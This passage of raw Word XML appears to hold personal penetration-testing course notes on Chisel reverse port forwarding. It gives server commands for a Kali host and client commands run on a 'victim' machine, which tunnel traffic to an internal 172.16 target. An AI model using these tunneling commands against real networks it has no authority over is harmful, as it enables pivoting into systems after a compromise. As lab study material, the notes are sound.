        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip chisel_linux_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x chisel_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv chisel_linux_amd64 chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename it for convenience</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_co4628n3cjxh" w:id="85"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Reverse Single Port Forwarding) (windows)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is what I ran in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-B .150</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to port forward both port 5000 and 8000 from Kali to localhost on target machine. And this was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 8888 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel client 192.168.45.232:8888 R:5000:127.0.0.1:5000 R:8000:127.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We don't have to specify the listening address for our Kali since it's 127.0.0.1 by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The other 127.0.0.1 is more the target machine, meaning it will be trafficked to 127.0.0.1 on target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 27.4.2. Services and Sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw Chisel being used when our Kali was in the 192 subnet, and we wanted to access a web page on the 172 subnet. And we had compromised another user on the 172 subnet, so we used a reverse (single) port forward to connect from victim (compromised user) to Kali, and this sets up SOCKS proxy on Kali localhost. Then we can send traffic to our localhost, which gets sent to victim on 172, where it is run from the POV of victim, and so we can run commands from the 172 network (as victim). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specifically, we want the compromised user (victim) to forward our request to target user (in 172 network) on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get chisel on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod a+x chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a stands for "all"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x stands for "execute"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone can execute chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 8080 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Chisel server on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Chisel Listener on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means we are listening on 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload chisel to victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\chisel.exe client 192.168.119.5:8080 R:127.0.0.1:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want the traffic to be forwarded to localhost on target machine, then replace 172.16.6.241 with 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on the victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We tell it to connect back to our Kali on port 8080, where it's waiting for a Chisel connection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.119.5:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" stands for reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the local IP and port (on our Kali) that we should use to access the HTTP tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.241:80 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is where the traffic is being led to. This is the target machine on the 172 network that we want to access. So, all the traffic is sent to our compromised user (running chisel client) and then forwarded to this target user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009CC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="952500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="511" name="image493.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image493.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201"/>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9CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see these last two lines as a sign of connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="197" name="image191.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image191.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202"/>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9CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what it should look like on the client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
